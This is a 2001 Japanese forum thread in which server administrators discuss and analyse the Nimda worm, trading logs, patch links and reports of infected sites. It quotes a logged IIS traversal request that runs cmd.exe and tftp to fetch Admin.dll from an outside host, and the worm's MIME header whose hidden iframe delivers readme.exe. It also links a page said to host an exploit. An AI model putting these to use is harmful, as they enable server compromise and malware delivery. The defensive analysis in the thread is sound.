このワームって何でしょうか？

今日こんなログを見つけました。
CODEREDの穴を探して伝播するワームのようです。
ログにあったサイトからadmin.dllを頂いて解析してみたところ、
たしかに自己拡散を目的としたリソースが存在しています。


[2001/09/18 22:40:29] Undefine www
/_vti_bin/..%255c../..%255c../..%255c..
/winnt/system32/cmd.exe?
/c+tftp%20-i%2061.132.69.76%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0

なんでしょうね？
子これは事件だ！

位置位置スレッドをたてるな。コードレッドパート5 をミロ。氏ね池

>>3
つーか新型だろこれ。

ブルーもレッドもかわらない。

CodeBlueともちがう。

ftpしようとしてるの？

admin.dll中からREADME.EXEを送信するコード発見。

>>3,4は事態の深刻さが理解できていないようだ。

別スレにも海田が、戻りヘッダを参照してIIS以外には一行しか送らない
ように作れなかったのか？
それとも、偽装等を防止しているのか？
これまでは一行だったから笑っていられたが、困ったもんだ。

MSNがやられましたｗ
topを読むと送られてきます。
http://www.msn.co.jp/readme.eml

俺のIISレスポンスヘッダ動的に書き換えてApacheのふりしてるけど
ガンガン送られてきております。

>>9
深刻という意味が違う。
MS製品を使用するユーザが多いことが深刻。

>>13
そういう問題じゃないと思われ。MSNの状態をみていると、
今回はワームの進化型でもあり、そのワームに汚染されたIISは
接続したクライアントにREADME.EXEという怪しいファイルを
送りつける破壊サーバに変貌するようだ。
結構破壊力抜群かも。

Code青赤の発病として見ていいでしょうか？

>>15
だから違うっていってるだろ

15でし。
ちょっと他スレからあちこち読んでみました。ちがうぞ〜！はい。
えらい祭りになりそうです。アフガンといい、Nimdaといい、、、
やっぱりラディンがらみでしょうか。

社内緊急通報で明日アサイチで馬鹿がREADME.EXEダウンロード
しないように通知した・・・・。
俺の仕事は一向に進まない。つーかこんなことするために
残業してんじゃないんだ・・・・。

CERTの情報、WEBサーバのログ載せちゃいるが、肝心なとこが
切れてるな。tftp実行部ってIISのログには表示されんのか？

明日社内のパソコンに全部パッチ当てないと・・・

折れもIE5.01&5.5使ってる奴はパッチ当てるように
userにメールした。でもわかんない人も多いだろうから、
明日朝市で逝って来ます。

不正なMIMEヘッダ〜用のパッチはどれだっけ？

http://www.microsoft.com/JAPAN/support/kb/articles/JP290/1/08.htm

おお、ありがとう

tftpでもってきたadmin.dllが送出するヘッダ。
バイナリエディタで抜いたYO。

Content-Type: text/html;charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
Content-Type: audio/x-wav;name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID:

なるほどなって感じ。

結局これがコードグリーンか、もしくはＣＲクリーンの
どちらかの足跡じゃないの？
ＣＲの方は消滅するらしいけどグリーンはいつまでも
残るみたいね。

>>26
せめてニュースサイトくらい嫁。

>>27
そうかそうか
では何故このタイトルは「このワームって何でしょうか？」
ってなってるの？誰にきいてるの？
解決したらこのスレ終わり？

スレ立てた書き込み時刻は18日23:55で発生直後だろ。
立てる前には一通り他のスレみて酷似事例がないか探したさ。
でCodeBlueだろってマヌーな会話が繰り返されてる
だけだから新規でたてたの。その後解析したのも俺。
tftpを含むログがすでにどこかにでてたかい？
別にこのスレが終わってもなんとも思わんけど
シマンテックやトレンドよりは解析早かったはずだ。
まして逆切れするなんて　えーん君らしくないよ。

>>29
ごめんごめん、逆切れしたわけじゃないよ。
出張先からリモートで見たらヘンなログ出てきたな
ぐらいだったんで。
出張から帰って先にこの板見て、今うちのログの
お祭り騒ぎに目が点でした　スマソ。

うちも今日はパニックだったよ。
もっとも午前１時に部長級は叩き起こしといたから
対策行動自体はありとスムーズだった。

>>31
まいった、、調べたら知り合いのとこ１台やられてるようだ。
telでケーブル抜いてくれと言ったけど。
今から逝ってきます。。ヽ(；´д｀)ﾉ

ノートンでチェックしたらVBS.Haptime.A@mmに感染してた。
今は検疫場所にあるんですが、どうしたらいいんでしょか？
対処法がさっぱりわからないんで教えてください。

>>33
マルチポスト反対！

優秀な1がいるスレ。

今日一日みてて気づいたんだが、これってタイマ内蔵してるっぽいな。
23:00頃から大量に発生していた攻撃が、AM5:00頃を境にﾊﾟﾀｰﾘと
途絶えた。ちょうど6時間。この後同一のホストからのアクセス
が、一様にHTTP Proveに切り替わっている。
推測だが再度23:00(GMT+9)に攻撃開始するという可能性が高い。
US時間でいうとAM9:00、つまりワーキングタイムの開始時刻だ。
今日汚染されたPCが、深夜に活動開始するってわけだ。
（日付参照で１回きり動作ならいいんだがな。）

×prove
○probe
鬱だもう帰宅したい。

俺こういうのに疎くてこのワームの奴全然わかんないんだけど
２チャンの上の方に書いてあるやつでダウロードしろって
書いてある奴はどれをダウンロードすればいいの？
どれをダウンロードすればこのワームは防げるの？
そんでこれをダウンロードすると基本的に何が起こるの？
誰か教えてたもれ

>>37=1 がんばってー。応援してるよっ！

>>33
ここ見れ
http://www.symantec.com/region/jp/sarcj/data/v/[email protected]

ちゃんとリンクされてないみたいだから、コピペしてね

あ〜終わった終わった

あ〜終わった終わった
一応鯖はなんともなかったＹＯ

赤虫出まくりだった鯖、何回も警告メールだして、やっと来なくなったと思ったら
今度はw32.nimuda.a@mmが来まくっている・・・

ダメ管はいつまで経ってもダメ管なのかな？
それともパッチ一つで終わりとでも思っているのだろうか？
最悪、管理者がいないのか？（この可能性が一番高いな（鬱　）

ん？赤虫のパッチ当ててたら、ニムダは問題ないはずだし・・・（謎

案の定活動開始した模様

何でしょうか。

http://www.clubtgp.com/freehosting/nature/gallery.htm

>>46
JS_Exception_Exploit
Microsoft VMの脆弱性をついたプログラム

踏むなよ

http://www.msn.co.jp/topyom/blobs/www-img-topyom-01_20011009120741.gif
↑画面向かって右 サイコメトラーエイジさん

ブルーもレッドもかわらない。

Ninda Ninda 〜♪Ninda Ninda Ninda 〜♪

http://ton.2ch.net/test/read.cgi/sec/1001864573/339

なっ、なんだよこれー（＞＜）

http://www.panasonic.tcp.ne.jp/

<HTML><BODY><META HTTP-EQUIV="Refresh" CONTENT="0;http://www.yahoo.co.jp/"></BODY></HTML>
これでループしてるらしい。

>>52

この会社、なんでこんなへんなクラックされてるんだろ？

よいしょ